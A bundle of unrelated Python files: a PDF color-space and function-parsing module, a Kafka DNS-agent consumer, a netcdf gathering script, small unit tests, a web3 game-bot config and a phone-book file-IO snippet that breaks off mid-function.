    """Registry/factory mapping PDF color-space literals to handler classes."""

    @property
    def defaults(self):
        """Map each known color-space literal (and abbreviation) to its class."""
        default_values = [
            (GrayColorSpace, LIT('DeviceGray'), LIT('G')),
            (RGBColorSpace, LIT('DeviceRGB'), LIT('RGB')),
            (CMYKColorSpace, LIT('DeviceCMYK'), LIT('CMYK')),
            (CalGrayColorSpace, LIT('CalGray')),
            (CalRGBColorSpace, LIT('CalRGB')),
            (LabColorSpace, LIT('Lab')),
            (ICCBasedColorSpace, LIT('ICCBased')),
            (IndexedColorSpace, LIT('Indexed')),
            (SeparationColorSpace, LIT('Separation')),
            # (DeviceNColorSpace, LIT('DeviceN')),
            (PatternColorSpace, LIT('Pattern')),
            (NColorSpace, LIT('DeviceN')),
        ]
        refs = {}
        for tpl in default_values:
            # First tuple element is the class; the rest are its literal aliases.
            for alias in tpl[1:]:
                refs[alias] = tpl[0]
        return refs

    def parse(self, obj, args=None):
        """Resolve ``obj`` into a ColorSpace instance, or None when unknown.

        Args:
            obj: a PDF object — literal, indirect reference, or a
                ``[family, *params]`` list form.
            args: constructor arguments carried over from the list form.
        """
        # args=None avoids the original mutable-default-argument (args=[]).
        if args is None:
            args = []
        if isinstance(obj, PDFObjRef):
            obj = resolve1(obj)
        if isinstance(obj, PSLiteral):
            cs = self.defaults.get(obj)
            if not cs:
                return None
                # raise TypeError('unknown color space: %s' % obj.name)
            return cs(*args)
        if isinstance(obj, list):
            return self.parse(obj[0], args=obj[1:])
class ColorSpace:
    """Base color space: identity conversions and default overprint mask."""
    overprintMask = 0x0f
    # Identity fallback used for all conversion hooks.
    # NOTE(review): `pipe` is a plain function assigned in the class body, so
    # when invoked as an instance method the bound `self` is included in
    # *val and therefore in the returned tuple — confirm this is intended
    # before relying on base-class conversions directly.
    pipe = lambda *val: val
    getGray = pipe
    getRGB = pipe
    getCMYK = pipe
    mapGray = pipe
    mapRGB = pipe
    mapCMYK = pipe
class GrayColorSpace(ColorSpace):
    """Single-component device gray."""
    mode = 'L'
    ncomps = 1

    def getRGB(self, gray):
        """Gray maps to equal R, G and B components."""
        return gray, gray, gray

    def getCMYK(self, gray):
        """Gray carries over to the K channel only; CMY stay zero."""
        return 0, 0, 0, gray
class CalGrayColorSpace(GrayColorSpace):
    """CIE-calibrated gray; white/black point and gamma come from PDF params."""
    whiteX = whiteY = whiteZ = 1
    blackX = blackY = blackZ = 0
    gamma = 1

    def __init__(self, obj):
        obj = resolve1(obj)
        params = dict_value(obj)
        # Use .get with the class defaults (consistent with CalRGBColorSpace)
        # so a params dict missing the optional keys does not raise KeyError.
        self.whiteX, self.whiteY, self.whiteZ = params.get('WhitePoint', (1, 1, 1))
        self.blackX, self.blackY, self.blackZ = params.get('BlackPoint', (0, 0, 0))
        self.gamma = params.get('Gamma', 1)
class RGBColorSpace(ColorSpace):
    """Three-component device RGB."""
    mode = 'RGB'
    ncomps = 3

    def getGray(self, r, g, b):
        # ITU-R BT.601 luma weights.
        return 0.299 * r + 0.587 * g + 0.114 * b

    def getCMYK(self, r, g, b):
        # Naive RGB->CMYK with gray-component replacement (k = min of CMY).
        c = 1 - r
        m = 1 - g
        y = 1 - b
        k = min(c, m, y)
        return c - k, m - k, y - k, k

    def mapGray(self, arr):
        # Vectorized getGray over an (..., 3) array.
        return self.getGray(arr[..., 0], arr[..., 1], arr[..., 2])

    def mapCMYK(self, arr):
        # Vectorized uint8 variant of getCMYK: with k = max(R,G,B), channel
        # C = k - R (= 255*(c - k') in the scalar formula) and K = 255 - k.
        k = arr.max(-1)
        out = np.empty_like(arr)
        out[..., 0] = k - arr[..., 0]
        out[..., 1] = k - arr[..., 1]
        out[..., 2] = k - arr[..., 2]
        k = k[..., np.newaxis]
        return np.concatenate((out, 255 - k), axis=-1)
class CalRGBColorSpace(RGBColorSpace):
    """CIE-calibrated RGB; reads calibration parameters from the PDF dict."""
    # Default XYZ transform: identity.
    matrix = [
        1, 0, 0,
        0, 1, 0,
        0, 0, 1
    ]

    def __init__(self, obj):
        params = dict_value(resolve1(obj))
        self.whiteX, self.whiteY, self.whiteZ = params.get('WhitePoint', (1, 1, 1))
        self.blackX, self.blackY, self.blackZ = params.get('BlackPoint', (0, 0, 0))
        self.gammaR, self.gammaG, self.gammaB = params.get('Gamma', (1, 1, 1))
        self.matrix = params.get('Matrix', self.matrix)
class CMYKColorSpace(ColorSpace):
    """Four-component device CMYK."""
    mode = 'CMYK'
    ncomps = 4
    # RGB contribution for each of the 16 corner combinations of
    # (C, M, Y, K) in {0,1}^4, in itertools.product order (see getRGB).
    factors = [
        [1, 1, 1],
        [0.1373, 0.1216, 0.1255],
        [1, 0.9490, 0],
        [0.1098, 0.1020, 0],
        [0.9255, 0, 0.5490],
        [0.1412, 0, 0],
        [0.9294, 0.1098, 0.1412],
        [0.1333, 0, 0],
        [0, 0.6784, 0.9373],
        [0, 0.0588, 0.1412],
        [0, 0.6510, 0.3137],
        [0, 0.0745, 0],
        [0.1804, 0.1922, 0.5725],
        [0, 0, 0.0078],
        [0.2118, 0.2119, 0.2235],
        [0, 0, 0]
    ]

    def getGray(self, c, m, y, k):
        # Inverse of the BT.601 luma weights applied to CMY, minus K.
        return 1 - k - 0.3 * c - 0.59 * m - 0.11 * y

    def getRGB(self, c, m, y, k, r=0, g=0, b=0):
        """Multilinear interpolation over the 16 corner colors in `factors`.

        r/g/b act as accumulators: mapRGB passes numpy array views so the
        `+=` below fills them in place.
        """
        c1, m1, y1, k1 = 1-c, 1-m, 1-y, 1-k
        for i, (b0, b1, b2, b3) in enumerate(product([c1, c], [m1, m], [y1, y], [k1, k])):
            x = b0 * b1 * b2 * b3
            r += self.factors[i][0] * x
            g += self.factors[i][1] * x
            b += self.factors[i][2] * x
        return r, g, b

    def mapGray(self, arr):
        # Vectorized getGray on a 0-255 scale.
        return 255 - arr[..., 3] - 0.3 * arr[..., 0] - 0.59 * arr[..., 1] - 0.11 * arr[..., 2]

    def mapRGB(self, arr):
        """Vectorized CMYK->RGB for a (..., 4) uint8 array."""
        arr = arr.astype('float') / 255
        # Bug fix: the output must start at zero because getRGB accumulates
        # into it with `+=`; np.empty_like left uninitialized memory in the
        # result.
        out = np.zeros_like(arr[..., :-1], dtype='float')
        self.getRGB(*(arr[..., i] for i in range(4)),
                    *(out[..., i] for i in range(3)))
        return (out * 255).astype('uint8')
# CIE XYZ -> linear RGB conversion matrix (rows correspond to R, G, B).
xyzrgb = [
    [3.240449, -1.537136, -0.498531],
    [-0.969265, 1.876011, 0.041556],
    [0.055643, -0.204026, 1.057229]
]
class LabColorSpace(ColorSpace):
    """CIE L*a*b* color space with white/black point taken from PDF params."""
    mode = 'LAB'
    ncomps = 3

    def __init__(self, obj):
        obj = resolve1(obj)
        params = dict_value(obj)
        self.whiteX, self.whiteY, self.whiteZ = params.get(
            'WhitePoint', (1, 1, 1))
        self.blackX, self.blackY, self.blackZ = params.get(
            'BlackPoint', (0, 0, 0))
        self.aMin, self.bMin, self.aMax, self.bMax = params.get(
            'Range', (-100, -100, 100, 100))
        # Per-row white-point normalization constants for the XYZ->RGB matrix.
        self.kr = 1 / (
            xyzrgb[0][0] * self.whiteX +
            xyzrgb[0][1] * self.whiteY +
            xyzrgb[0][2] * self.whiteZ
        )
        self.kg = 1 / (
            xyzrgb[1][0] * self.whiteX +
            xyzrgb[1][1] * self.whiteY +
            xyzrgb[1][2] * self.whiteZ
        )
        self.kb = 1 / (
            xyzrgb[2][0] * self.whiteX +
            xyzrgb[2][1] * self.whiteY +
            xyzrgb[2][2] * self.whiteZ
        )

    def getGray(self, l, a, b):
        # BT.601 luma of the RGB conversion (+0.5, presumably for rounding —
        # confirm).
        r, g, b = self.getRGB(l, a, b)
        return 0.299 * r + 0.587 * g + 0.114 * b + 0.5

    def getRGB(self, l, a, b):
        # Inverse of the CIE Lab f() transfer function.
        def lab2xyz(t): return t ** 3 if (t >= 6 /
                                          29) else (108 / 841 * (t - 4 / 29))
        # convert L*a*b* to CIE 1931 XYZ color space
        t1 = (l + 16) / 116
        t2 = t1 + a / 500
        X = lab2xyz(t2)
        X *= self.whiteX
        Y = lab2xyz(t1)
        Y *= self.whiteY
        t2 = t1 - b / 200
        Z = lab2xyz(t2)
        Z *= self.whiteZ
        # convert XYZ to RGB, including gamut mapping and gamma correction
        r = xyzrgb[0][0] * X + xyzrgb[0][1] * Y + xyzrgb[0][2] * Z
        g = xyzrgb[1][0] * X + xyzrgb[1][1] * Y + xyzrgb[1][2] * Z
        b = xyzrgb[2][0] * X + xyzrgb[2][1] * Y + xyzrgb[2][2] * Z
        # Square root approximates a gamma-2 correction.
        return r ** 0.5, g ** 0.5, b ** 0.5

    def getCMYK(self, l, a, b):
        # Via RGB, with gray-component replacement (k = min of CMY).
        r, g, b = self.getRGB(l, a, b)
        c = 1 - r
        m = 1 - g
        y = 1 - b
        k = min(c, m, y)
        return c - k, m - k, y - k, k
class ICCBasedColorSpace(ColorSpace):
    """ICC-profile-based space; delegates conversion to a device space
    selected from the profile's color-space signature."""
    @property
    def defaults(self):
        # Map ICC signature -> device color-space class used as fallback.
        return {
            'L': GrayColorSpace,
            'RGB': RGBColorSpace,
            'CMYK': CMYKColorSpace,
            'LAB': LabColorSpace
        }
    mode = 'RGB'

    def __init__(self, obj):
        obj = resolve1(obj)
        fp = BytesIO(obj.get_data())
        self.profile = ImageCms.ImageCmsProfile(fp)
        fp.close()
        self.mode = self.profile.profile.color_space
        if self.mode == 'LAB':
            # Lab needs calibration parameters, taken from the Alternate entry.
            alt = resolve1(obj['Alternate'])
            if isinstance(alt, list):
                alt = alt[1]
            self.base = self.defaults[self.mode](alt)
        else:
            self.base = self.defaults[self.mode]()
        # NOTE: one component per letter of the signature (L=1, RGB=3,
        # CMYK=4, LAB=3).
        self.ncomps = len(self.mode)

    def getGray(self, *val):
        return self.base.getGray(*val)

    def getRGB(self, *val):
        return self.base.getRGB(*val)

    def getCMYK(self, *val):
        return self.base.getCMYK(*val)
class IndexedColorSpace(ColorSpace):
    """Palette-indexed space: one index component looked up in a base-space
    palette."""
    mode = 'P'
    basemode = 'RGB'
    # Fallback grayscale identity palette, replaced when lookup data exists.
    palette = list(map(lambda i: (i, i, i), range(256)))
    ncomps = 1

    def __init__(self, base, hival, obj):
        cs = colorSpaces()
        self.base = cs.parse(resolve1(base))
        self.hival = int(resolve1(hival))
        obj = resolve1(obj)
        data = b''
        if isinstance(obj, bytes):
            data = obj
        elif isinstance(obj, PDFStream):
            data = obj.get_data()
        if data:
            # Split the flat byte string into base-space component tuples.
            n = self.base.ncomps
            self.palette = [[data[i * n + j] for j in range(n)] for i in range(len(data) // n)]

    def lookup(self, index):
        # Clamp out-of-range indices to the palette bounds.
        i = max(0, min(index, len(self.palette) - 1))
        return self.palette[i]

    def getGray(self, index):
        return self.base.getGray(*self.lookup(index))

    def getRGB(self, index):
        return self.base.getRGB(*self.lookup(index))

    def getCMYK(self, index):
        return self.base.getCMYK(*self.lookup(index))

    def mapPixels(self, arr):
        # Vectorized palette lookup for an array of indices.
        palette = np.array(self.palette, dtype='uint8')
        return palette[arr]

    def mapGray(self, arr):
        return self.base.mapGray(arr)

    def mapRGB(self, arr):
        return self.base.mapRGB(arr)

    def mapCMYK(self, arr):
        return self.base.mapCMYK(arr)
class functionParser:
    """Clamping helpers shared by the PDF function parsers.

    Scalars are clamped with min/max; numpy arrays are clamped IN PLACE.
    """

    def _min(self, value, limit):
        """Clamp ``value`` from above by ``limit``."""
        if not isinstance(value, (int, float)):
            value[value >= limit] = limit  # in-place for arrays
            return value
        return min(value, limit)

    def _max(self, value, limit):
        """Clamp ``value`` from below by ``limit``."""
        if not isinstance(value, (int, float)):
            value[value < limit] = limit  # in-place for arrays
            return value
        return max(value, limit)
class SampledFunctionParser(functionParser):
    """Type-0 (sampled) PDF function.

    NOTE(review): parse() only clamps the inputs and maps them into encoded
    sample coordinates; the actual sample-table lookup and Decode step do
    not appear to be implemented here — confirm against callers.
    """

    def __init__(self, spec, domain):
        self.domain = domain
        self.frange = list_value(spec['Range'])
        # Domain/Range hold [min, max] pairs, so component counts are half
        # their lengths.
        self.nins = len(self.domain) >> 1
        self.nouts = len(self.frange) >> 1
        self.sizes = list_value(spec['Size'])[:self.nins]
        self.bits = int(spec['BitsPerSample'])
        if 'Encode' in spec:
            self.encode = list_value(spec['Encode'])
        else:
            # Default encoding spans each table dimension: [0, size-1].
            self.encode = [0] * (self.nins << 1)
            self.encode[1::2] = [size-1 for size in self.sizes]
        self.decode = list_value(
            spec['Decode']) if 'Decode' in spec else self.frange[:]
    # domain = [0 1]
    # range = [0 1 0 1 0 1 0 1]
    # bits = 8
    # sizes = [1024]
    # encode = [0 1023]
    # decode = [0 1 0 1 0 1 0 1]

    def interpolate(self, x, xmin, xmax, ymin, ymax):
        # Linear map of x from [xmin, xmax] onto [ymin, ymax].
        return (ymax - ymin) / (xmax-xmin) * (x-xmin) + ymin

    def parse(self, *args):
        """Return the clamped, encoded sample coordinate for each input."""
        e = []
        for i in range(self.nins):
            # Clamp to the domain, map into encode space, clamp to indices.
            x = self._min(
                self._max(args[i], self.domain[i*2]), self.domain[i*2+1])
            x = self.interpolate(
                x, self.domain[i*2], self.domain[i*2+1], self.encode[i*2], self.encode[i*2+1])
            e.append(self._min(self._max(x, 0), self.sizes[i]-1))
        return e
def SampledFunction(spec, domain):
    """Build a Type-0 (sampled) PDF function and return its evaluator."""
    return SampledFunctionParser(spec, domain).parse
class ExponentialFunctionParser(functionParser):
    """Type-2 (exponential interpolation) PDF function over 0-255 inputs."""

    def __init__(self, spec, domain):
        self.c0, self.c1 = [0], [1]
        if spec.get('C0'):
            self.c0 = [float(x) for x in list_value(spec['C0'])]
        if spec.get('C1'):
            self.c1 = [float(x) for x in list_value(spec['C1'])]
        self.n = spec['N']
        self.frange = None
        if spec.get('Range'):
            self.frange = list_value(spec.get('Range'))
        self.domain = domain

    def parse(self, ipt):
        """Evaluate the function at ``ipt`` (scalar or array on a 0-255 scale).

        Returns one 0-255 output per (C0, C1) component pair.
        """
        # Rebind rather than the original in-place `ipt /= 255`, which
        # silently mutated a caller-supplied numpy array.
        ipt = ipt / 255
        ipt = self._min(self._max(ipt, self.domain[0]), self.domain[1])
        opt = []
        for i in range(len(self.c0)):
            # C0 + x^N * (C1 - C0), clipped to Range when present.
            x = self.c0[i] + pow(ipt, self.n) * (self.c1[i] - self.c0[i])
            if self.frange:
                x = self._min(self._max(x, self.frange[0]), self.frange[1])
            opt.append(x * 255)
        return opt
def ExponentialFunction(spec, domain):
    """Build a Type-2 (exponential) PDF function and return its evaluator."""
    return ExponentialFunctionParser(spec, domain).parse
def StitchingFunction(spec, domain):
    # Type-3 (stitching) functions are not implemented; the resulting None
    # is tolerated by callers (e.g. SeparationColorSpace.mapPixels checks
    # `if not self.func`).
    pass
class PSFunctionParser(PSStackParser):
    """Type-4 (PostScript calculator) function interpreter.

    The program is tokenized once at construction; parse() then executes
    the token list against the supplied arguments.
    """

    def __init__(self, fp):
        super().__init__(fp)
        self.run()

    def run(self):
        """Tokenize the whole program body; PSEOF marks end of input."""
        try:
            self.nextobject()
        except PSEOF:
            pass
        # The parsed (pos, objs) pair's object list becomes the program.
        _, self.argstack = self.curstack.pop()
        self.reset()

    def parse(self, *args):
        """Execute the program with ``args`` preceding the token stream."""
        argstack = list(args) + self.argstack
        self.curstack = []
        while argstack:
            obj = argstack.pop(0)
            if isinstance(obj, PSKeyword):
                # Operators dispatch to do_<name> handlers; handler results
                # (scalar or sequence) are pushed back on the stack.
                name = keyword_name(obj)
                if not isinstance(name, str):
                    name = name.decode()
                result = getattr(self, 'do_'+name)()
                if result is not None:
                    if isinstance(result, (list, tuple)):
                        self.curstack += list(result)
                    else:
                        self.curstack.append(result)
            else:
                # Operands are pushed as-is.
                self.curstack.append(obj)
        return self.curstack

    def do_keyword(self, pos, token):
        self.push((pos, token))

    def do_roll(self):
        # n j roll: rotate the top n stack elements by j positions.
        n, j = self.pop(2)
        vals = self.pop(n)
        j %= n
        if not j:
            return vals
        return (vals*2)[n-j:n*2-j]

    def do_dup(self):
        x = self.pop(1)
        return x + x

    def do_exch(self):
        a, b = self.pop(2)
        return b, a

    def do_sub(self):
        # NOTE(review): pop(2) yields (earlier, top); returning b - a
        # computes top - earlier, which looks reversed relative to
        # PostScript's `x y sub` = x - y (compare do_roll, where the earlier
        # operand is n).  The array branch additionally clamps negative
        # results to 0.  Confirm both behaviors are intended.
        a, b = self.pop(2)
        if isinstance(b, (int, float)):
            return b - a
        b[b < a] = 0
        b[b >= a] -= a
        return b

    def do_pop(self):
        self.pop(1)

    def do_index(self):
        # n index: copy the n-th element down from the top of the stack.
        i = self.pop(1)[0]
        return self.curstack[-i-1]

    def do_cvr(self):
        # Convert to real.
        num = self.pop(1)[0]
        return float(num)

    def do_mul(self):
        a, b = self.pop(2)
        return a * b
def PostScriptFunction(spec, domain):
    """Build a Type-4 (PostScript calculator) function and return its evaluator."""
    return PSFunctionParser(BytesIO(spec.get_data())).parse
def func_parse(spec):
    """Dispatch a PDF function dict to the builder for its FunctionType."""
    builders = {
        0: SampledFunction,
        2: ExponentialFunction,
        3: StitchingFunction,
        4: PostScriptFunction,
    }
    func_type = int(spec.get('FunctionType'))
    domain = list_value(spec.get('Domain'))
    return builders[func_type](spec, domain)
class SeparationColorSpace(ColorSpace):
    """Separation space: tint values mapped through a transform function
    into an alternate (base) color space.

    NOTE(review): per the parse() call order the parameters correspond to
    the PDF array [/Separation name alternate tintTransform], so `alt`
    receives the colorant name and `base` the alternate space — confirm.
    """
    mode = 'P'

    def __init__(self, alt, base, func, *args):
        cs = colorSpaces()
        self.base = cs.parse(resolve1(base))
        spec = resolve1(func)
        # Number of input components = half the Domain array length.
        self.ncomps = len(spec['Domain']) >> 1
        self.func = func_parse(spec)

    def transform(self, *val):
        # Run the tint transform, keeping only the base space's components.
        transformed = self.func(*val)
        new_val = []
        for i in range(self.base.ncomps):
            new_val.append(transformed[i])
        return new_val

    def mapPixels(self, arr):
        """Transform a whole pixel array into base-space components."""
        # An unimplemented function type (StitchingFunction) yields
        # func=None: pass the pixels through unchanged.
        if not self.func:
            return arr
        if len(arr.shape) == 2:
            arr = arr[..., np.newaxis]
        w, h, d = arr.shape
        arr = arr.astype('float')
        transformed = self.transform(*[arr[..., i] for i in range(d)])
        result = None
        for layer in transformed:
            # Scalar outputs become constant planes.
            if isinstance(layer, (int, float)):
                layer = np.ones((w, h), dtype='float') * layer
            layer = layer.astype('uint8')
            if result is None:
                result = layer
            else:
                result = np.dstack([result, layer])
        return result

    def getGray(self, *val):
        val = self.transform(*val)
        return self.base.getGray(*val)

    def getRGB(self, *val):
        val = self.transform(*val)
        return self.base.getRGB(*val)

    def getCMYK(self, *val):
        val = self.transform(*val)
        return self.base.getCMYK(*val)

    def mapGray(self, arr):
        return self.base.mapGray(arr)

    def mapRGB(self, arr):
        return self.base.mapRGB(arr)

    def mapCMYK(self, arr):
        return self.base.mapCMYK(arr)
class NColorSpace(SeparationColorSpace):
    """DeviceN space: several named ink channels mapped through a tint
    transform into the alternate space (registered under /DeviceN)."""
    mode = 'P'

    def __init__(self, names, alt, func, *attrs):
        self.names = list_value(names)
        self.base = colorSpaces().parse(resolve1(alt))
        spec = resolve1(func)
        # Number of input components = half the Domain array length.
        self.ncomps = len(spec['Domain']) >> 1
        self.func = func_parse(spec)
class PatternColorSpace(ColorSpace):
    """Pattern color space, optionally wrapping an underlying space."""
    under = None
    mode = 'P'
    ncomps = 1

    def __init__(self, *args):
        if args:
            self.under = colorSpaces().parse(resolve1(args[0]))
# Module-level convenience handles onto the registry.
defaults = colorSpaces().defaults
parse = colorSpaces().parse
|
import json
import logging
import os
import sys
from confluent_kafka import Consumer, KafkaException
from dnsagent import agent
logger = logging.getLogger(__name__)
def consume():
    """Consume Kafka messages and forward their knot queries to the agent.

    Broker/topic/group/agent settings come from RESTKNOT_* environment
    variables.  Loops forever until KeyboardInterrupt.
    """
    brokers = os.environ.get("RESTKNOT_KAFKA_BROKERS")
    topic = os.environ.get("RESTKNOT_KAFKA_TOPIC")
    group_id = os.environ.get("RESTKNOT_KAFKA_GROUP_ID")
    agent_type = os.environ.get("RESTKNOT_AGENT_TYPE")
    conf = {
        "bootstrap.servers": brokers,
        "group.id": group_id,
        "auto.offset.reset": "earliest",
        "enable.auto.commit": True,
    }

    def print_assignment(consumer, partitions):
        # Called by the client once partitions are assigned.
        logger.info(f"Consumer assigned to: {partitions}")

    consumer = Consumer(conf)
    consumer.subscribe([topic], on_assign=print_assignment)
    try:
        while True:
            message = consumer.poll(timeout=1.0)
            if message is None:
                continue
            if message.error():
                raise KafkaException(message.error())
            message = message.value()
            message = json.loads(message.decode("utf-8"))
            # Only act on messages addressed to this agent type.
            agent_type_msg = message["agent"]["agent_type"]
            if agent_type in agent_type_msg:
                knot_queries = message["knot"]
                for query in knot_queries:
                    agent.execute(query)
    except KeyboardInterrupt:
        print(" dnsagent stopped. Aborted by user")
    finally:
        # Close down consumer to commit final offsets.
        consumer.close()
def configure_logger():
    """Attach an INFO-level stdout handler; the root logger records DEBUG."""
    handler = logging.StreamHandler(sys.stdout)
    formatter = logging.Formatter(
        "[%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s"
    )
    handler.setFormatter(formatter)
    handler.setLevel(logging.INFO)
    root_logger = logging.getLogger()
    root_logger.addHandler(handler)
    root_logger.setLevel(logging.DEBUG)
def main():
    """Wire up logging, then run the consumer loop until interrupted."""
    configure_logger()
    consume()

if __name__ == "__main__":
    main()
|
import argparse
import subprocess
import wandb
from config import PROJECT, BUCKET
# Initial condition timesteps to gather for training data
train_timestamps = ["1", "3", "4", "5", "7", "8", "10", "11", "12"]
# Initial condition timesteps to gather for testing data
valid_timestamps = ["2", "6", "9"]

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description=(
            "This script gathers netcdfs from a set of training runs"
            " and uploads them to train/test groups on GCS. Runs are"
            " assumed to be in "
            "gs://<BUCKET>/<PROJECT>/<RUN_DATE>/<TAG>/artifacts/<TIMESTAMP>/netcdf_output" # noqa E501
            " format to be gathered. The <RUN_DATE> is the date the job"
            " was performed and <TAG> the unique project name."
        )
    )
    parser.add_argument(
        "run_date", help="date string when training was run, e.g., 2021-11-18"
    )
    parser.add_argument("tag_prefix", help="Common tag prefix for training data runs")
    args = parser.parse_args()
    # Track this gather job in Weights & Biases.
    run = wandb.init(
        job_type="netcdf-gather", project="microphysics-emulation", entity="ai2cm"
    )
    wandb.config.update(args)
    base_url = f"gs://{BUCKET}/{PROJECT}/{args.run_date}"
    train_out = f"{base_url}/{args.tag_prefix}-training_netcdfs/train"
    valid_out = f"{base_url}/{args.tag_prefix}-training_netcdfs/test"
    # Copy each timestep's netcdf outputs into the train/test destinations.
    command = ["gsutil", "-m", "cp"]
    for timestamp in train_timestamps:
        tag = f"{args.tag_prefix}-{timestamp}"
        nc_src = f"{base_url}/{tag}/artifacts/*/netcdf_output/*.nc"
        dir_args = [nc_src, train_out]
        subprocess.check_call(command + dir_args)
    for timestamp in valid_timestamps:
        tag = f"{args.tag_prefix}-{timestamp}"
        nc_src = f"{base_url}/{tag}/artifacts/*/netcdf_output/*.nc"
        dir_args = [nc_src, valid_out]
        subprocess.check_call(command + dir_args)
    artifact = wandb.Artifact("microphysics-training-data", type="training_netcdfs")
    # NOTE(review): the copies above go to .../{tag_prefix}-training_netcdfs,
    # but this reference points at .../training_netcdfs (no prefix) — confirm
    # which location the artifact should track.
    artifact.add_reference(f"{base_url}/training_netcdfs")
    wandb.log_artifact(artifact)
|
import time
from get_model_and_data import get_model_and_data
from probflow.callbacks import TimeOut
def test_TimeOut():
    """fit() should be cut short by the TimeOut callback, not by epochs."""
    model, x, y = get_model_and_data()
    timeout_callback = TimeOut(2)
    start = time.time()
    # epochs is deliberately huge; only the 2s timeout should end training.
    model.fit(x, y, batch_size=5, epochs=10000, callbacks=[timeout_callback])
    assert time.time() - start < 4
|
import re
def get_text(string):
    """Normalize whitespace and strip HTML markup from ``string``.

    Runs of whitespace collapse to a single space; each HTML tag is then
    replaced with a space.
    """
    # Raw strings avoid invalid-escape-sequence warnings in the patterns.
    text = re.sub(r'\s+', ' ', string)
    text = re.sub(r'<.*?>', ' ', text)
    return text
# Demo call (Python 2 `print` statement syntax); the odd characters appear
# to be mis-encoded apostrophes in the sample text.
print get_text("<pre>Hi,<br><br>Unless IEm mistaken, this bill has not been paida Do I know if there is a problem or if itEs just an oversight ?<br><br>If itEs an oversight, thank you to make the emergency ")
import typing
from web3 import Web3
from src.common.types import ConfigTeam, ConfigUser, Tus, TeamTask, LootStrategyName, ReinforceStrategyName
from .dotenv import getenv
import os
from typing import List, cast
from src.common.exceptions import InvalidConfig, MissingConfig
from eth_typing import Address
#################
# Parse
#################
# Project directory
# Project directory
rootDir: str = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))

# Teams: one entry per configured team, built from USER_*_TEAM_* env vars.
teams: List[ConfigTeam] = [
    {
        'id': int(getenv('USER_1_TEAM_1')),
        'userAddress': cast(Address, getenv('USER_1_ADDRESS')),
        'battlePoints': int(getenv('USER_1_TEAM_1_BATTLE_POINTS')),
        'task': cast(TeamTask, getenv('USER_1_TEAM_1_TASK', 'mine')), # not implemented yet
        'lootStrategyName': cast(LootStrategyName, getenv('USER_1_TEAM_1_LOOT_STRATEGY', 'LowestBp')),
        'reinforceStrategyName': cast(ReinforceStrategyName, getenv('USER_1_TEAM_1_REINFORCE_STRATEGY', 'HighestBp')),
    },
]

# Users
users: List[ConfigUser] = [
    {
        'name': getenv('USER_1_NAME'),
        'address': cast(Address, getenv('USER_1_ADDRESS')),
        'privateKey': getenv('USER_1_PRIVATE_KEY'),
        # NOTE(review): int() runs before the `or 0` fallback on this line,
        # so an unset USER_1_MAX_PRICE_TO_REINFORCE raises instead of
        # defaulting (contrast with the Wei line below, where `or 0` is
        # inside int()).
        'maxPriceToReinforceInTus': cast(Tus, int(getenv('USER_1_MAX_PRICE_TO_REINFORCE')) or 0), # in TUS
        'maxPriceToReinforceInTusWei': Web3.toWei(int(getenv('USER_1_MAX_PRICE_TO_REINFORCE') or 0), 'ether'), # in TUS wei
        # Attach the teams whose userAddress matches this user's address.
        'teams': [ t for t in teams if t['userAddress'] == cast(Address, getenv('USER_1_ADDRESS')) ]
    },
]

# RPC
nodeUri = getenv('WEB3_NODE_URI')

# Gas
defaultGas = getenv('DEFAULT_GAS', '200000') # units
defaultGasPrice = getenv('DEFAULT_GAS_PRICE', '25') # gwei

# Twilio
twilio = {
    "accountSid": getenv('TWILIO_ACCOUNT_SID'),
    "authToken": getenv('TWILIO_AUTH_TOKEN'),
}

# Notifications
notifications = {
    "sms": {
        "enable": True if "1" == str(getenv('NOTIFICATION_SMS', '0')) else False,
        "from": getenv('NOTIFICATION_SMS_FROM'),
        "to": getenv('NOTIFICATION_SMS_TO'),
    }
}
#################
# Validate
#################
# Validate teams
for team in teams:
    # Each configured string must be one of its type's allowed values.
    if team['task'] not in typing.get_args(TeamTask):
        raise InvalidConfig(f"task of team {team['id']} must be one of {str(typing.get_args(TeamTask))}, is '{team['task']}'")
    if team['lootStrategyName'] not in typing.get_args(LootStrategyName):
        raise InvalidConfig(f"lootStrategy of team {team['id']} must be one of {str(typing.get_args(LootStrategyName))}, is '{team['lootStrategyName']}'")
    if team['reinforceStrategyName'] not in typing.get_args(ReinforceStrategyName):
        raise InvalidConfig(f"reinforceStrategy of team {team['id']} must be one of {str(typing.get_args(ReinforceStrategyName))}, is '{team['reinforceStrategyName']}'")

# Validate users
for user in users:
    if not user['address']:
        raise MissingConfig("User has no ADDRESS")
    # The reinforcement price cap must be a positive number.
    maxPrice = user.get('maxPriceToReinforceInTus')
    if not maxPrice or maxPrice <= 0:
        raise MissingConfig("User has no or invalid MAX_PRICE_TO_REINFORCE (must be a value greater than zero)")
|
from django.http import HttpResponse
def index(request):
    """Return a plain response confirming the project is reachable."""
    return HttpResponse("Welcome page, project works!")
|
import os
import sys
def test_wrong_merge():
p = os.popen("grep -rnw ./djcourses -e \'<<<<<<< HEAD\'").read()
if p:
print(p)
sys.exit(1)
sys.exit(0)
if __name__ == "__main__":
test_wrong_merge() |
import unittest
import cmdtools
class TestProcess(unittest.TestCase):
    """Exercises cmdtools command parsing and processing."""

    def test_process(self):
        parsed = cmdtools.Cmd("/sum 10 10 10", convert_args=True)
        self.assertEqual(parsed.process_cmd(TestProcess.sum), 30, "boo")

    def test_match(self):
        parsed = cmdtools.Cmd('/sell "Gold" 50', convert_args=True)
        self.assertTrue(parsed.match_args("si"), "boo")

    def test_match_(self):
        parsed = cmdtools.Cmd("/add 10 40 20 59", convert_args=True)
        self.assertTrue(parsed.match_args("i" * len(parsed.args)), "boo")

    def test_default(self):
        parsed = cmdtools.Cmd("/get")
        self.assertEqual("Hello World", parsed.process_cmd(TestProcess.get))

    def get(text="Hello World"):
        # Plain callback (no self); passed unbound via TestProcess.get.
        return text

    def sum(*args):
        # `sum` inside the body resolves to the builtin, not this method.
        return sum(args)
|
# File IO - Append
# File
# Flat-file phone book; each line is "first_name,last_name,phone_number".
my_file = "my_phone_book.txt"
# Add
def add_entry(first_name, last_name, phone_number):
    """Append one "first,last,phone" line to the phone book file."""
    with open(my_file, "a") as file_handler:
        file_handler.write(",".join((first_name, last_name, phone_number)) + "\n")
# Get list
def get_list_from_file(file_name):
    """Read the phone book at *file_name* into a list of newline-free lines."""
    with open(file_name, "r") as file_handler:
        return [line.replace("\n", "") for line in file_handler]
# Write list to phone book file
def write_list_to_file(phone_book_list, file_name):
    """Overwrite *file_name* with one phone-book entry per line.

